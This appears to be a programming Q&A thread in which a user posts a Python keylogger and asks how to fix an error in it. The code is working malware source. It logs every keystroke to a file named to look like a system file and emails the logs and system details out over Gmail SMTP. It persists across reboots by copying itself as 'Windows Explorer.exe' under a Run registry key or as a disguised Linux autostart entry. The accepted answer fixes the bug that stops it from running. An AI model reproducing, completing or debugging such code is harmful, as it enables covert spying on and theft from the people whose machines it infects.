# Making a Local Keylogger sending email everytime system boots with python

Tags: python, oop, methods, keylogger

```
     "This is my first coding question on stack so maybe not upto mark"
```

So I am trying to make a local keylogger that would store all keystrokes in a .txt file
and when the system reboots send the file to my email using smtp and again start the keylogger.

The code is as follows:

```
import pynput.keyboard
import smtplib
import os
import shutil
import subprocess
import sys
import stat
import platform
import getpass
import socket
import time
```

class Keylogger:

```
 def __init__(self, email, password):
    self.email = email
    self.password = password
    self.system_info = self.get_system_info()

def append_to_log(self, string):
    self.log = self.log + string
    file = open(r"C:\Program Files\explorer.txt", "wb")
    file.write(self.log)


def check_internet(self):
    ipaddress = socket.gethostbyname(socket.gethostname())
    while ipaddress=="127.0.0.1":
        time.sleep(10)
        ipaddress = socket.gethostbyname(socket.gethostname())
    self.report()


def get_system_info(self):
    uname = platform.uname()
    os = uname[0] + " " + uname[2] + " " + uname[3]
    computer_name = uname[1]
    user = getpass.getuser()
    return "Operating System:\t" + os + "\nComputer Name:\t\t" + computer_name + "\nUser:\t\t\t\t" + user

def process_key_press(self, key):
    try:
        current_key = str(key.char)
    except AttributeError:
        if key == key.space:
            current_key = " "
        else:
            current_key = " " + str(key) + " "
    self.append_to_log(current_key)

def report(self):
    self.send_mail(self.log)


def send_mail(self, message):

    message = "Subject: Alogger report\n\n" + "Report From:\n\n" + self.system_info + "\n\nLogs:\n" + message
    server = smtplib.SMTP("smtp.gmail.com", 587)
    server.starttls()
    server.login(self.email, self.password)
    server.sendmail(self.email, self.email, message)
    server.quit()

def start(self):
    keyboard_listener = pynput.keyboard.Listener(on_press=self.process_key_press)
    with keyboard_listener:
        keyboard_listener.join()



def become_persistent(self):
    if sys.platform.startswith("win"):
        self.become_persistent_on_windows()
    elif sys.platform.startswith("linux"):
        self.become_persistent_on_linux()

def become_persistent_on_windows(self):
    evil_file_location = os.environ["appdata"] + "\\Windows Explorer.exe"
    if not os.path.exists(evil_file_location):
        self.log = "* Keylogger started * "
        shutil.copyfile(sys.executable, evil_file_location)
        subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v winexplorer /t REG_SZ /d "' + evil_file_location + '"', shell=True)

def become_persistent_on_linux(self):
    home_config_directory = os.path.expanduser('~') + "/.config/"
    autostart_path = home_config_directory + "/autostart/"
    autostart_file = autostart_path + "xinput.desktop"
    if not os.path.isfile(autostart_file):
        self.log = "** Keylogger started **"
        try:
            os.makedirs(autostart_path)
        except OSError:
            pass

        destination_file = home_config_directory + "xnput"
        shutil.copyfile(sys.executable, destination_file)
        self.chmod_to_exec(destination_file)

        with open(autostart_file, 'w') as out:
            out.write("[Desktop Entry]\nType=Application\nX-GNOME-Autostart-enabled=true\n")
            out.write("Name=Xinput\nExec=" + destination_file + "\n")



def chmod_to_exec(self, file):
    os.chmod(file, os.stat(file).st_mode | stat.S_IEXEC)

#end of class


#starting Keylogger not included in class

if not  os.path.exists(r"C:\Program Files\explorer.txt"):
     Keylogger.become_persistent()
     file = open(r"C:\Program Files\explorer.txt", "wb")
     Keylogger.start()
elif os.path.exists(r"C:\Program Files\explorer.txt") and 
os.stat(file_path).st_size 
<= 0:
      Keylogger.start()
else:
    Keylogger.check_internet()
    os.remove(r"C:\Program Files\explorer.txt")
    Keylogger.start()
```

So i get the following errors:

```
Traceback (most recent call last):
File "C:/Users/MYPC/PycharmProjects/self_made_hack/venv/keylogger local.py", line 
108, in <module>
Keylogger.become_persistent()
TypeError: become_persistent() missing 1 required positional argument: 'self'
```

This is my first advance project so many errors will be there.
so what are suggestions and solutions for this code

Answer (score 0, accepted):

You're using the `Keylogger` class directly, but instead you should declare an *instance* of that class:

```
my_keylogger = Keylogger()
my_keylogger.become_persistent()
```

Comment: Are there some more suggentions? Like some errors and mistakes.@John Gordon